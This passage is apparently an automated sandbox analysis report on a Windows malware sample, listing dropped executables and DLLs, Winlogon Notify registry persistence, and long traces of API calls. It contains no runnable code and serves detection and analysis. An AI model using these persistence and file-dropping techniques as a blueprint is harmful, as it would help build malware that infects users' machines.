Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPa0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFil1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,FindCloseChangeNotification,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetVa2_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: anfidear.exe.0.drStatic PE information: real checksum: 0x18972 should be: 0x1b896
Source: YsyrcskNFK.exeStatic PE information: real checksum: 0x18972 should be: 0x1b896

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\anfidear.exeExecutable created and started: C:\Windows\SysWOW64\anfidear.exeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeFile created: C:\Users\user\AppData\Roaming\cbofad-ugum.dllJump to dropped file
Source: C:\Users\user\Desktop\YsyrcskNFK.exeFile created: C:\Windows\SysWOW64\anfidear.exeJump to dropped file
Source: C:\Windows\SysWOW64\anfidear.exeFile created: C:\Windows\SysWOW64\oucradeam.dllJump to dropped file
Source: C:\Users\user\Desktop\YsyrcskNFK.exeFile created: C:\Windows\SysWOW64\anfidear.exeJump to dropped file
Source: C:\Windows\SysWOW64\anfidear.exeFile created: C:\Windows\SysWOW64\oucradeam.dllJump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} DLLNameJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} DLLNameJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} StartupJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} StartupJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeWindow / User API: threadDelayed 2218Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeWindow / User API: threadDelayed 7254Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\cbofad-ugum.dllJump to dropped file
